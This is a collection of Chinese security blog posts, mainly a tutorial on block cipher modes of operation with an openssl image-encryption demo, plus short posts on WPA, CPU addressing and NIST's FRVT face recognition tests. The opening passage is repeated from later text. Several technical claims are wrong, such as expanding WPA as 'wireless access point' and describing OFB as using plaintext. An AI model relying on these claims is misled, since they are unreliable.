Cipher Block Chaining (CBC),不變的 key,以及前一個密文會先針對明文加密。

  • 優點:
    相同明文,會因為前一個的密文不同造就出不同的密文,也就是加密器多一個新的狀態。
  • 缺點:
    • 一個密文 Ci 的錯誤,會導致兩個明文解析錯誤 (Pi & Pi+1)。
    • 第一次加密很容易被抽換 bitwise,因為每次驅動的 Initial Vector 都相同。

CFB

Cipher FeedBack (CFB),類似 CBC,但前一個密文的結果只影響一部分的加密關係,然後將前一段密文狀態加密 key,再對明文加密。

  • 優點:
    • 支持即時 (real-time) 通訊
    • 只需要加密器,加密做兩次相當於解密。
    • 支持自同步 (self-synchronization),即使中斷連線、訊息錯誤,可以在數個週期後再次同步運作。
    • 藉由自同步的概念,可以捨棄掉 Initial Vector。
    • 後半部的明文,可以透過週期性的部分密文建立解密狀態,支持 random access。
  • 缺點:
    • error propagation 錯誤增長,當一個訊息錯誤時,需要好幾個週期後才能修正回來,這導致中間的解密訊息都不能用。
    • 雜訊過多的情況下,不宜使用。

OFB

Output FeedBack (OFB),類似於 CFB,將前一段的加密 key 拿回來加密,不依賴接收的密文狀態。

  • 優點:
    • 支持即時 (real-time) 通訊
    • 只需要加密器,加密做兩次相當於解密。
    • 相較於 CFB,沒有錯誤增長的情況。
    • 依序使用的 key,可以事先算出來,然後依次使用。
    • 雜訊下支持的能力好。
  • 缺點:
    • 必須一直保持同步
    • 訊息被修改時,不易被發現,只單純影響單一明文 (沒有錯誤增長)。
    • 起始狀態的 Initial Vector,不能重複使用,否則很容易被攻擊者抓到。
    • 加設沒有預先算 key,沒辦法解密出後半部的明文。

CTR

Counter (CTR),類似於 OFB,直接利用計數器作為加密 key。

  • 優點:
    • 加解密可以平行化處理,如果加解密速度耗時,可以選擇這一種。
    • 支持 random access。
  • 缺點:
    • 必須一直保持同步
    • 訊息被修改時,不易被發現,只單純影響單一明文 (沒有錯誤增長)。
    • 起始狀態的 Initial Vector,不能重複使用,否則很容易被攻擊者抓到。

為什麼要有初始向量 (initialization vector , IV)

有個概念我們要先知道。我們需要兩個元素去實行加密和解密:「初始向量」和「金鑰」。 你有可能會問初始向量有甚麼用途? 一般加密演算法,會將原始資料切成多個區塊進行加密動作, 如果我們只用一個金鑰值與每個明文區塊去做加密,這樣子所得到的每個密文區塊,都是相同的加密模式,會比較容易被破解。(如下圖)
截圖 2020-10-06 上午10.49.55

所以加密演算法使用一種類似遞回的方法將資料加密,它是由三個輸入去產生一個加密過的片段,分別是「上一個已加密片段」、「現在還沒加密的資料片段」、「金鑰」。 因為演算法在一開始時並沒有「上一個加密過的片段」,這就是為什麼要用到初始向量的原因了。(如下圖)
截圖 2020-10-06 上午10.50.02

加密圖片演示

用加密圖片來舉例來說明,即便不知道原理,也可以很直觀的感受,下圖為明文圖片:

羊-明文

經ECB模式加密的圖片:

羊-AES-ECB

圖中也正好驗證了AES的擴散效果:作為區域性圖案的羊頭,其紅顏色在加密後擴散到了整張圖片上。

經CBC模式有 IV 的加密的圖片:

羊-AES-CBC

初始向量 (initialization vector , IV) 需要加密嗎?

IV 與金鑰(Key)不同, 其主要目的為讓加密模式的隨機化及混淆,因此並==無安全性==考量,因此無須保密或額外加密

但由於重覆使用,容易導致泄露明文 block 的某些資訊,因此一直重用反而會導致加密模式失去安全性

不應在使用同一金鑰的情況下兩次使用同一個IV

如何產生加密圖片

注意一點==要使用 BMP 的影像格式==

使用 BMP 原因是 BMP檔案資訊不會壓縮,因為檔案很大通常不會在網路上使用這種格式

但對我們需求,不會因為加密檔案後造成無法解析圖片的問題

#產生 ECB 加密圖片
openssl enc -aes-128-ecb -e -in img.bmp -out img-ecb.bmp -K 111111
#產生 CBC 加密圖片
openssl enc -aes-128-cbc -e -in img.bmp -out img-cbc.bmp -K 111111 -iv 000000

為了程式碼簡潔,key 及 iv 只有填寫六位,長度不足,不過系統會自動補齊但會出現警告訊息

hex string is too short, padding with zero bytes to length

產生檔案後發現無法打開,這是因為二進位檔案都是透過 檔案抬頭(Header) 識別是什麼檔案,因為加密後,已經都被打散成亂數

截圖 2020-10-06 上午10.33.07

上圖左圖是正常BMP 格式,右圖是加密後檔案,顯然抬頭已不見

接著使用 HEX 編輯器,將原始檔案開頭開始的 54 bytes 抬頭資訊複製到加密後檔案,讓其圖片可以正常被解析

我使用 HEX 編輯器是 Hex Fiend

下方是我原始檔案截取出的 54 bytes 讓大家看的比較清楚,使用時需要使用自己原始的BMP Header hex 資訊

424D6057 0B000000 00003600 00002800 0000DD01 00000702 00000100 18000000 00002A57 0B00120B 0000120B 00000000 00000000 0000
截圖 2020-10-06 上午10.37.04

這樣就可以正常打開加密後的圖片

另外補充,用覆蓋開頭 54 bytes 或直接插入 54 bytes 都可以正常打開圖片

小結

上面的加密模式,裡面包含了區塊加密法 和 串流加密法 使用的加密模式,只要確定你所需的場景,在選擇就不會出錯

但若無並行,資料缺失等考量,目前多數單純密文及範例都是使用 CBC ,雖然說越新的當然越好,但還是需要看需求考量

整理如下

特點加密模式
區塊加密:ECB、CBC、CTR
串流加密:CFB、OFB
傳遞誤差(資料不能有缺失):CBC、CFB
不傳遞誤差(資料允許缺失):ECB、OFB、CTR
可並行:ECB、CTR
不可並行:CBC、OFB、CFB

參考資料

https://zh.wikipedia.org/wiki/%E6%B5%81%E5%AF%86%E7%A0%81

第 12 屆 iThome 鐵人賽DAY210Security

看完眼眶濕濕的App開發者慘烈對抗險惡資安環境血與淚的控訴!系列 第 21 篇

Day 21. 加密演算法要注意的那些毛 (一) – 加密模式

12th鐵人賽羊小咩2020-10-06 21:09:1310543 瀏覽https://www.facebook.com/v2.6/plugins/like.php?action=like&app_id=&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1a9c384fa4d044%26domain%3Dithelp.ithome.com.tw%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Fithelp.ithome.com.tw%252Ff22e093224d2bb4%26relation%3Dparent.parent&container_width=694&href=https%3A%2F%2Fithelp.ithome.com.tw%2Farticles%2F10249953&layout=button_count&locale=zh_TW&sdk=joey&share=false&show_faces=false&width=36px

這個章節來講對稱式加密一些細節 ,如果有心細的讀者已經發現在使用 DES 及 AES ,會看到 ECB 、CBC 、PKCS7、IV 等有如外星人的語言般參數或誰誰誰說什麼比較好,這章我們就是要來掀開這些神祕面紗

加密模式(mode of operation)

分組加密演算法是按分組大小來進行加解密操作的,如DES演算法的分組是64位,而AES是128位,但實際明文的長度一般要遠大於分組大小,這樣的情況如何處理呢?

這正是即工作模式要解決的問題:明文資料流怎樣按分組大小切分,資料不對齊的情況怎麼處理等等。

早在1981年,DES演算法公佈之後,NIST在標準文獻FIPS 81中公佈了4種工作模式:

  • 電子密碼本:Electronic Code Book Mode (ECB)
  • 密碼分組連結:Cipher Block Chaining Mode (CBC)
  • 密文反饋:Cipher Feedback Mode (CFB)
  • 輸出反饋:Output Feedback Mode (OFB)

2001年又針對AES加入了新的工作模式:

  • 計數器模式:Counter Mode (CTR)

後來又陸續引入其它新的工作模式。在此僅介紹幾種常用的

ECB:電子密碼本模式

ECB模式只是將明文按分組大小切分,然後用同樣的金鑰正常加密切分好的明文分組。

image-20201005193407516

ECB的理想應用場景是短資料(如加密金鑰)的加密。此模式的問題是無法隱藏原明文資料的模式,因為同樣的明文分組加密得到的密文也是一樣的。

CBC:密碼分組連結模式

此模式是1976年由IBM所發明,引入了IV(初始化向量:Initialization Vector)的概念。IV是長度為分組大小的一組隨機,通常情況下不用保密,不過在大多數情況下,針對同一金鑰不應多次使用同一組IV。 CBC要求第一個分組的明文在加密運算前先與IV進行異或;從第二組開始,所有的明文先與前一分組加密後的密文進行異或。[區塊鏈(blockchain)的鼻祖!]

AES: 密碼分組連結模式

CBC模式相比ECB實現了更好的模式隱藏,但因為其將密文引入運算,加解密操作無法並行操作。同時引入的IV向量,還需要加、解密雙方共同知曉方可。

CFB:密文反饋模式

與CBC模式類似,但不同的地方在於,CFB模式先生成密碼流字典,然後用密碼字典與明文進行異或操作並最終生成密文。後一分組的密碼字典的生成需要前一分組的密文參與運算。

AES: 密文反饋模式

CFB模式是用分組演算法實現流演算法,明文資料不需要按分組大小對齊。

OFB:輸出反饋模式

OFB模式與CFB模式不同的地方是:生成字典的時候會採用明文參與運算,CFB採用的是密文。

AES: 輸出反饋模式

CTR:計數器模式模式

CTR模式同樣會產生流密碼字典,但同是會引入一個計數,以保證任意長時間均不會產生重複輸出。

AES: 計數器模式

CTR模式只需要實現加密演算法以生成字典,明文資料與之異或後得到密文,反之便是解密過程。CTR模式可以採用並行演算法處理以提升吞量,另外加密資料塊的訪問可以是隨機的,與前後上下文無關。

CCM:Counter with CBC-MAC

CCM模式,全稱是Counter with Cipher Block Chaining-Message Authentication Code,是CTR工作模式和CMAC認證演算法的組合體,可以同時資料加密和鑑別服務。

明文資料通過CTR模式加密成密文,然後在密文後面再附加上認證資料,所以最終的密文會比明文要長。具體的加密流程如下描述:先對明文資料認證併產生一個tag,在後續加密過程中使用此tag和IV生成校驗值U。然後用CTR模式來加密原輸入明文資料,在密文的後面附上校驗碼U。

GCM:伽羅瓦計數器模式 Galois/Counter Mode

GCM模式是CTR和GHASH的組合,GHASH操作定義為密文結果與金鑰以及訊息長度在GF(2^128)域上相乘。GCM比CCM的優勢是在於更高並行度及更好的效能。

GCM中的G就是指GMAC,C就是指CTR。
GCM可以提供對消息的加密和完整性校驗,另外,它還可以提供附加消息的完整性校驗。在實際應用場景中,有些信息是我們不需要保密,但信息的接收者需要確認它的真實性的,例如源IP,源端口,目的IP,IV,等等。因此,我們可以將這一部分作為附加消息加入到MAC值的計算當中。下圖的Ek表示用對稱秘鑰k對輸入做AES運算。最後,密文接收者會收到密文、IV(計數器CTR的初始值)、MAC值。

500px-GCM-Galois_Counter_Mode_with_IV.svg (1)

由於GCM現在屬於最嚴謹的加密模式,TLS 1.2標準使用的就是AES-GCM演算法。

加密模式優缺點

ECB

Electronic CodeBook (ECB),不變的 key,需要加密器和解密器,加解密的複雜度可能不同。

  • 優點:
    構造簡單、容易實做
  • 缺點:
    長時間下,容易被偵測。影像資料的差異性不大,很容易被辨識到重複性,相較於文字很容易受前後文的影響。

CBC

Cipher Block Chaining (CBC),不變的 key,以及前一個密文會先針對明文加密。

  • 優點:
    相同明文,會因為前一個的密文不同造就出不同的密文,也就是加密器多一個新的狀態。
  • 缺點:
    • 一個密文 Ci 的錯誤,會導致兩個明文解析錯誤 (Pi & Pi+1)。
    • 第一次加密很容易被抽換 bitwise,因為每次驅動的 Initial Vector 都相同。

CFB

Cipher FeedBack (CFB),類似 CBC,但前一個密文的結果只影響一部分的加密關係,然後將前一段密文狀態加密 key,再對明文加密。

  • 優點:
    • 支持即時 (real-time) 通訊
    • 只需要加密器,加密做兩次相當於解密。
    • 支持自同步 (self-synchronization),即使中斷連線、訊息錯誤,可以在數個週期後再次同步運作。
    • 藉由自同步的概念,可以捨棄掉 Initial Vector。
    • 後半部的明文,可以透過週期性的部分密文建立解密狀態,支持 random access。
  • 缺點:
    • error propagation 錯誤增長,當一個訊息錯誤時,需要好幾個週期後才能修正回來,這導致中間的解密訊息都不能用。
    • 雜訊過多的情況下,不宜使用。

OFB

Output FeedBack (OFB),類似於 CFB,將前一段的加密 key 拿回來加密,不依賴接收的密文狀態。

  • 優點:
    • 支持即時 (real-time) 通訊
    • 只需要加密器,加密做兩次相當於解密。
    • 相較於 CFB,沒有錯誤增長的情況。
    • 依序使用的 key,可以事先算出來,然後依次使用。
    • 雜訊下支持的能力好。
  • 缺點:
    • 必須一直保持同步
    • 訊息被修改時,不易被發現,只單純影響單一明文 (沒有錯誤增長)。
    • 起始狀態的 Initial Vector,不能重複使用,否則很容易被攻擊者抓到。
    • 加設沒有預先算 key,沒辦法解密出後半部的明文。

CTR

Counter (CTR),類似於 OFB,直接利用計數器作為加密 key。

  • 優點:
    • 加解密可以平行化處理,如果加解密速度耗時,可以選擇這一種。
    • 支持 random access。
  • 缺點:
    • 必須一直保持同步
    • 訊息被修改時,不易被發現,只單純影響單一明文 (沒有錯誤增長)。
    • 起始狀態的 Initial Vector,不能重複使用,否則很容易被攻擊者抓到。

為什麼要有初始向量 (initialization vector , IV)

有個概念我們要先知道。我們需要兩個元素去實行加密和解密:「初始向量」和「金鑰」。 你有可能會問初始向量有甚麼用途? 一般加密演算法,會將原始資料切成多個區塊進行加密動作, 如果我們只用一個金鑰值與每個明文區塊去做加密,這樣子所得到的每個密文區塊,都是相同的加密模式,會比較容易被破解。(如下圖)
截圖 2020-10-06 上午10.49.55

所以加密演算法使用一種類似遞回的方法將資料加密,它是由三個輸入去產生一個加密過的片段,分別是「上一個已加密片段」、「現在還沒加密的資料片段」、「金鑰」。 因為演算法在一開始時並沒有「上一個加密過的片段」,這就是為什麼要用到初始向量的原因了。(如下圖)
截圖 2020-10-06 上午10.50.02

加密圖片演示

用加密圖片來舉例來說明,即便不知道原理,也可以很直觀的感受,下圖為明文圖片:

羊-明文

經ECB模式加密的圖片:

羊-AES-ECB

圖中也正好驗證了AES的擴散效果:作為區域性圖案的羊頭,其紅顏色在加密後擴散到了整張圖片上。

經CBC模式有 IV 的加密的圖片:

羊-AES-CBC

初始向量 (initialization vector , IV) 需要加密嗎?

IV 與金鑰(Key)不同, 其主要目的為讓加密模式的隨機化及混淆,因此並==無安全性==考量,因此無須保密或額外加密

但由於重覆使用,容易導致泄露明文 block 的某些資訊,因此一直重用反而會導致加密模式失去安全性

不應在使用同一金鑰的情況下兩次使用同一個IV

如何產生加密圖片

注意一點==要使用 BMP 的影像格式==

使用 BMP 原因是 BMP檔案資訊不會壓縮,因為檔案很大通常不會在網路上使用這種格式

但對我們需求,不會因為加密檔案後造成無法解析圖片的問題

#產生 ECB 加密圖片
openssl enc -aes-128-ecb -e -in img.bmp -out img-ecb.bmp -K 111111
#產生 CBC 加密圖片
openssl enc -aes-128-cbc -e -in img.bmp -out img-cbc.bmp -K 111111 -iv 000000

為了程式碼簡潔,key 及 iv 只有填寫六位,長度不足,不過系統會自動補齊但會出現警告訊息

hex string is too short, padding with zero bytes to length

產生檔案後發現無法打開,這是因為二進位檔案都是透過 檔案抬頭(Header) 識別是什麼檔案,因為加密後,已經都被打散成亂數

截圖 2020-10-06 上午10.33.07

上圖左圖是正常BMP 格式,右圖是加密後檔案,顯然抬頭已不見

接著使用 HEX 編輯器,將原始檔案開頭開始的 54 bytes 抬頭資訊複製到加密後檔案,讓其圖片可以正常被解析

我使用 HEX 編輯器是 Hex Fiend

下方是我原始檔案截取出的 54 bytes 讓大家看的比較清楚,使用時需要使用自己原始的BMP Header hex 資訊

424D6057 0B000000 00003600 00002800 0000DD01 00000702 00000100 18000000 00002A57 0B00120B 0000120B 00000000 00000000 0000
截圖 2020-10-06 上午10.37.04

這樣就可以正常打開加密後的圖片

另外補充,用覆蓋開頭 54 bytes 或直接插入 54 bytes 都可以正常打開圖片

小結

上面的加密模式,裡面包含了區塊加密法 和 串流加密法 使用的加密模式,只要確定你所需的場景,在選擇就不會出錯

但若無並行,資料缺失等考量,目前多數單純密文及範例都是使用 CBC ,雖然說越新的當然越好,但還是需要看需求考量

整理如下

特點加密模式
區塊加密:ECB、CBC、CTR
串流加密:CFB、OFB
傳遞誤差(資料不能有缺失):CBC、CFB
不傳遞誤差(資料允許缺失):ECB、OFB、CTR
可並行:ECB、CTR
不可並行:CBC、OFB、CFB

參考資料

https://zh.wikipedia.org/wiki/%E5%88%86%E7%BB%84%E5%AF%86%E7%A0%81%E5%B7%A5%E4%BD%9C%E6%A8%A1%E5%BC%8F

https://medium.com/@JakenH/today-im-going-teach-you-how-to-encrypt-a-simple-picture-that-you-can-download-here-141ce9b0b738

https://en.wikipedia.org/wiki/Galois/Counter_Mode

https://zh.wikipedia.org/wiki/%E5%88%86%E7%BB%84%E5%AF%86%E7%A0%81

https://zh.wikipedia.org/wiki/%E6%B5%81%E5%AF%86%E7%A0%81

https://blog.csdn.net/T0mato_/article/details/53160772

資料來源:https://ithelp.ithome.com.tw/articles/10249953

分類
Cissp-WentzWu

wireless security

WI-FI的WPA/WPA2/WPA3 (WPA即wireless access point, 無線基地台)的規格, 分別規範了真實性(身份驗證如何作), 機密性及資料完整性等議題. 其中身份驗證可以用共享金鑰(PSK, Pre-Shared Key)的方式, 也可以用802.1X的方式. 為了方便溝通與推廣, PSK又稱為個人模式(Personal), 802.1X又稱為企業模式(Enterprise). 模式的英文, 有人用mode, 用人用profile. 即personal mode或personal profile.

分類
CISSP

中央處理單元 (CPU) 的立即尋址(Immediate addressing)模式中,指令本身指定了的運算元

https://ithelp.ithome.com.tw/upload/images/20211227/20132160TeTH9twhFm.jpg
-計算機架構
CPU 指令將值加載到寄存器中進行計算是很常見的。CPU 的尋址模式意味著 CPU 如何定位感興趣的值。值可以在指令中立即給出(立即尋址)、從寄存器讀取(寄存器尋址)或從主存儲器加載(直接、間接、基址+偏移)。
一條指令可以通過以下方式指示 CPU 將值加載到寄存器中:

  1. 提供值所在的內存地址(直接尋址),
  2. 提供指向值所在的另一個內存地址的內存地址(間接尋址),或
  3. 提供內存地址作為基址(起點)和值所在的偏移量(距離)(基址+偏移量尋址)。
    https://ithelp.ithome.com.tw/upload/images/20211227/20132160qomsXgESwO.jpg
    -運算符和操作數
    https://ithelp.ithome.com.tw/upload/images/20211227/20132160XJaF9ZIuSF.jpg
    -進程的內存佈局

參考
尋址方式
尋址模式和指令周期

資料來源: Wentz Wu QOTD-20210920

分類
Information Security

人臉辨識 — NIST & FRVT

「臉部辨識技術基準測試」由美國國家標準暨技術研究院所設立,該計畫獲美國聯邦調查局及國防部等國安部門贊助及協辦,為全球規模最大且最具權威的臉部辨識演算法評比,結果亦受全球高度矚目及信賴,吸引美、日、中、俄、歐等全球臉部辨識頂尖團隊投入此測試。

研究一下什麼是『臉部辨識技術基準測試』

美國國家標準暨技術研究院,簡稱NIST(National Institute of Standards and Technology),其隸屬於美國商務部,前身為國家標準局,從事一些應用基礎研究及測量技術和測試方法等,提供標準參考數據及有關服務。國家標準技術研究所美国 国家标准技术研究所( National Institute of Standards and Technology,简写为 NIST)的前身为 国家标准局(NBS,1901年~1988年),是一家测量标准 实验室,属于 美国商务部…zh.wikipedia.org

執行人臉識別測試的單位階層如下

Information Technology Laboratory
>>Information Access Division
>>>>Image Group

Information Technology Laboratory,縮稱ITL,是NIST七個研究實驗室之一,涵蓋計算機科學,數學,統計學和系統工程等領域。根據網路的文章,ITL實驗室有將近500名研究人員,年預算額近1.5億美元。

ITL底下再細分為七個研究部門

  1. 計算機安全部(Computer Security Divsion, CSD)
  2. 先進網絡技術部(Advanced Network Technologies Division)
  3. 應用和計算數學部( Applied and Computational Mathematics Division)
  4. 應用資安部(Applied Cyber​​security Division)
  5. 資訊擷取部( Information Access Division)
    底下再分為 圖像組(Image Group)、多模式信息組(Multimodal Information Group)、檢索組(Retrieval Group)、可視化和可用性組(Visualization and Usability Group)
  6. 軟體與系統部( Software and Systems Division)
  7. 統計工程部(Statistical Engineering Division)

Image Group內的工作主要是針對生物資訊的識別技術做研究,使這些技術所蒐集的數據在各機構之間共享,並且提升整體之生物識別技術準確程度。

包含指紋、虹膜、臉部、紋身等,並各自在再細分為若干個project,而FRVT便是臉部項目之下的一項研究計畫。

Face Recognition Vendor Test (FRVT),其主要目的是測試人臉識別算法水準,由於是相對獨立的第三方測試,受商業因素影響較小,因此相對比較公平公正,是目前全球最具權威臉部辨識演算法評比之一。Face Recognition Vendor Test (FRVT) OngoingFRVT is an ongoing activity, and all evaluations run continuously with no submission deadlines. For the FRVT 1:1, 1:N…www.nist.gov

可以看出在目前FRVT底下還有四個測驗集正在執行,分別為 1:1、1:N、MORPH 及 Quality,如下圖,可以從上方連結進入之後,再找到各別測驗集可以看到更詳細的說明、及最新的報告。

先來看一下主項目的說明

FRVT Summary

FRVT is an ongoing activity, and all evaluations run continuously with no submission deadlines. For the FRVT 1:1, 1:N, and Quality tracks, participants may send ONE submission as often as every four calendar months from the last submission for evaluation. For FRVT MORPH, the number and schedule of submissions is currently not limited, so participants can send submissions at any time. Algorithm submissions will be processed on a first-come first-serve basis for inclusion in subsequent reports.

這邊講的是FRVT的接受測試方式,最一開始,FRVT測評在之前一共舉辦過五次(FRVT 2000, FRVT 2002,FRVT 2006, FRVT 2010, FRVT 2013)。

而從2017 年2 月份開始,NIST 開始組織新的人臉識別測評,不同於以往的測評,這次測評沒有截止日期,參加測評者可以根據自身進度提交算法,每隔一段時間出一次報告。

FRVT 1:1的頁面並沒有完整的說明怎樣叫1:1測試,主要也是因為概念很簡單,就是把一張照片裡有一個人頭,去對比另一張也有一個人頭的照片,看看這兩個人是不是同一個人。

主要用來比賽的精準度,真正的算法有點數學,有些難理解。但概念上,有在我們上一篇提過。人臉辨識 — 基本流程/測試標準因工作關係投入研究人臉辨識 此篇主要為網路資料整理 若有問題或指教歡迎留言或來信medium.com

誤識率(FAR)=(本應FALSE的判錯 / 所有FALSE )

拒識率(FRR)=(本應TRUE的判錯 / 所有TRUE )

再白話一點 FAR 就是兩個不同的人不小心判成同一個人。FRR就是兩個同一個人不小心判成不同人。

然後在FRVT裡,主要會用FMR及FNMR作為名詞

FAR, False Acceptance Rate = FMR, False Match Rate
FRR, False Rejection Rate = FNMR, False Non-Match Rate

FNMR和FMR代價往往不太一樣,誤識會是一個很嚴重的事故(可以假裝別人,取款、辦帳戶),相比之下,拒識結果相對可以接受(只是辨不出來,造成不便)。

所以如果只統計識別率,並不能完整的解釋臉辨系統的性能。通常的作法是,調節算法閾值,得到不同FNMR和FMR,然後畫出拒識和誤識相關曲線(即ROC曲線),NIST就是應用ROC來計算及比較算法的性能

至於ROC怎麼算,就交給工程師吧,一般產品應用單位只要分的出來FNMR跟FMR就很好了ROC和CMC曲线的理解(FAR, FRR的理解)ROC曲线 ROC曲线 意为受试者工作特征曲线 (receiver operating characteristic curve,简称ROC曲线)。曲线上没一个点反映着对同一信号刺激的感受性。 横轴:负正类率(false postive…zhuanlan.zhihu.com

下一步,就是測驗用的資料集

FRVT資料集是完全不公開的,沒錯,完全不公開,不管是測試、或實際用來做測驗的都沒有,只有簡略的幾段話描述。
如下圖舉Visa照的例子。

從文字中可以想像一下,你所使用的測試集大概會有哪些照片、解析度的範圍、人種、國家、年齡等等

FRVT測試不限定資料集,也會包含歐美人種,想收集覆蓋這麼多國家的人臉數據已經是非常困難了,其次,就算收集到一些數據,跟FRVT所要求的多種場景也會有差別

最新的版本主要分為五種類型的資料集

  • 簽證照片(Visa)。簽證照片是非常清晰、正面、無遮擋的一種受控測試場景,成像質量很高,且覆蓋了多達上百個國家的人臉數據。
  • 嫌疑人照片(Mugshot)。嫌疑人照片也是比較高清的,跟簽證照片相比,嫌疑人兩張照片間的年齡跨度一般會更大,有很多都超過了十年的年齡間隔。
  • 自然場景照片(Wild)。自然場景的照片是在非限制場景下採集的,各種光照,角度,遮擋,模糊,低分辨率的情況都可能會出現。
  • 兒童照片( Child exploitation)。兒童照片也是在非限制場景下採集的,因為年齡分佈跟大家的訓練集可能差別比較大,所以也是非常難的一個任務。
  • 網路攝影機(Webcam)。使用一般網路攝影機所拍攝的照片,容易有過曝、或光線不足的情況,不過由於架設角度固定,所以照片對人臉的角度,會比Wild來的受控。

然後可以看到這個測試,其實更新資料集的頻率滿高的,可以看到2019年2月的時候更換了mugshot database、2019年7月再新增Visa-Border資料集。

資料集的更新、新增、汰換不適用,會讓整體的測驗更有挑戰性,也展示NIST對於此驗證的嚴謹與重視,畢竟資料集的搜集十分耗費成本,同時也需要許多特殊管道(譬如犯罪資料庫、人權組織…等等)。

下一步,就是測試方法

在FRVT的測試中,NIST要求每個廠商或者研究機構都要提供完整的算法代碼,並且由NIST在同一個平台上來運行所有提交,得到最終各個測試集上的結果。

對於算法的運行時間也有著很嚴格的限制,所有提交都只能使用不超過CPU單線程1秒的計算資源來處理一張圖片從人臉檢測、人臉對齊到人臉特徵提取和識別的所有功能。

另外順帶一提的是CPU這件事情,原先的FRVT的測試中,是允許GPU的使用,直到2019年2月之後,NIST不再開放GPU使用,只能做CPU使用。我不太確定這個的主要原因是什麼,雖然可以讓測試環境更加單純,可以更佳的評比出演算法本身的優勢,不過GPU作為新一代AI應用的重要武器,使得FRVT本身會排除掉一些以GPU為主攻的演算法。

下一步,就是測試結果

順便來看一下 11/19的結果

解讀一下這個表,最左邊第一欄就是序號、第二欄就是演算法的名稱,其實大多都可以看得出來廠商名稱,譬如第一個3divi,就是俄羅斯的臉辨公司。然後第30、31 是ctbcbank 中國信託,第34、35是cyberlink 訊連,都是台灣的公司,看得出來訊連還是略勝一籌,不過兩個都是台灣的廠商,加油!

從第三欄開始都是FNMR,也就是配對失敗率(沒把李四認出是李四)。觀察FNMR的前提是,必須要先固定FMR(誤認率,把張三誤當成李四),因為兩者會互相影響,如下圖。

FNMR is the proportion of mated comparisons below a threshold set to achieve the FMR given in the header on the fourth row

而固定的FMR都列出於第四列,NIST也很貼心的在FNMR值的旁邊放上排名值,黃底的就是表現最好的第一名(FNMR最低)。

至於沒有出現的值是怎麼回事

Missing entries for visa, mugshot and wild images generally mean the algorithm did not run to completion. For child exploitation, missing entries arise because NIST executes those runs only infrequently

除了child exploitation之外,多代表這個演算法可能有問題,或是針對該類資料集表現太差,導致無法完成。

最後,來談一下殘酷的排名

在FRVT 1:1的頁面上,可以看到有排名(下圖是2019/11/19的報告結果)

The algorithms are ordered in terms of lowest mean rank across mugshot, visa, visa border, and wild datasets, rewarding broad accuracy over a good result on one particular dataset.

這個排行將mugshot, visa, visa border, and wild等資料集的測驗結果排名平均,也就是說,你不一定要每一項都是最好的,你只要整體平均好就好。

但事實上,實際情形的臉辨環境會比較偏向mugshot跟wild,所以如果某算法在Visa數據集上表現不錯,但是其在Mugshot和Wild數據集性能一般,代表針對受控環境下人臉識別性能較好,而無約束環境下人臉識別性能相對不足,也就是說在實際開放環境應用時,此算法會比較吃虧。

不過如何,整體排名還是可以代表一些意義。前三名分別為,visionlabs(俄羅斯)、deepglint(中國)、Ever AI(美國)。

再來是1:N,因為看過1:1,1:N的一些術語就比較容易理解。

The evaluation used four datasets — frontal mugshots, profile views, webcam photos and wild images — and the report lists accuracy results alongside developer names

mugshot、profile、webcam、wild是主要的四個資料集

The primary dataset is comprised of 26.6 million reasonably wellcontrolled live portrait photos of 12.3 million individuals.

資料集的數量大概有2.6千萬張照片、1.2千萬個人

From Fall 2019 this report will be updated continuously as new algorithms are submitted to FRVT, and run on new datasets. Participation in the one-to-many identification track requires a devloper to first demonstrate high accuracy in the one-to-one verification track of FRVT.

從2019年秋季開始,也跟1:1一樣變成提交測驗沒有截止日期,參加測評者可以根據自身進度提交算法,每隔一段時間出一次報告。

不過特別的是,要做1:N,就得先證明你的1:1實力。
下列兩個條件,必須符合其一,才可以提交1:N測驗。

  • VisaMC dataset: FNMR of 0.025 or less at FMR=0.0001
  • Mugshot dataset: FNMR of 0.025 or less at FMR=0.00001

接著來看1:N的測驗指標

在1:1的部分,我們會拿兩個人頭照片來比,由系統先判定True or False,再來看答案確認這兩個是不是應該屬於同一個人,所以其實就是對或錯。

但是在1:N時,會有幾個情境,譬如健身房的會員資料庫,當一個會員走進來的時候,演算法必須從庫裡面,找到屬於這個會員的資料,或是辨識出他不屬於此庫內的任何一人。另外一個情境,就是犯罪照片裡面有很多人,要從其中辨識出哪一個是我要找的罪犯。

就像上圖的流程這般,會找出這個1:N的辨識效能

  • 錯誤拒絕辨識率(FNIR),註冊使用者被錯誤辯識為其他註冊使用者比例
    False Negative Identification Error Rate
  • 錯誤接受辯識率(FPIR),非註冊使用者被辨識為某個註冊使用者比例
    False Positive Identification Error Rate

由於此兩個辨識率是互相關聯的,所以演算法的優劣,是將FPIR固定在一定閾值時,由FNIR的高低來判斷的。

在四個資料集內,有幾百萬張圖,這些圖內有些是同一個人,並且根據其拍攝日期接近做排序,使得測驗上還可以分為三種類型

第一種,我只挑時間上最相近(Most Recent)的,所以同一個人的只會有一張,我只是辨識出是哪一個就好。

第二種,同一個人會好幾張照片(Lifetime Consolidated),有時候資訊更多是件好事,但有時候不是,反而會干擾特徵值,對於演算法來說是一個挑戰。

第三種,所有的照片都混在一起,你不知道哪些是同一個人,這更難。

下一步,看結果,由於算法更複雜、資料集分類方式也多,所以測驗結果的總表會有很多張,我們挑某一張來看看就好。

FNIR at FPIR = 0.001 for five enrollment population sizes, N

表格裡的數字,主要就是FNIR,並指定FPIR為0.001。藍色小數字是排序,誤辨率約低越好,可以看到有水準的演算法,誤辨率都小於0.1%,代表整體的正確率達到98%以上。

2019/9/11發布的最新1:N報告中,其實好的名次都集中在三間廠商身上,包含微軟(美國)、優圖(中國)跟NEC(日本)。此外,商湯、Visionlabs、Ever AI、IDEMIA,也都是表現相當不錯的廠商。

結論

  1. FRVT並不代表動態影像的識別效能

無論是1:1或1:N,基本上都以靜態的影像做測驗,當然1:N會比較偏向真實情境的人臉辨識設置,因為攝影機內可能一次抓到多個人頭,再去找到、並識別出是否為會員、是否為員工等目標。Face in Video Evaluation (FIVE)The Face in Video Evaluation (FIVE) is being conducted to assess the capability of face recognition algorithms to…www.nist.gov

NIST也有做過Face in Video的測驗,不過沒有持續更新,最新的報告停留在2017年。且當時這個FIVE測驗也不屬於FRVT,當然後續可能會加入FRVT的一個新系列,或是與1:1、1:N測驗合併。

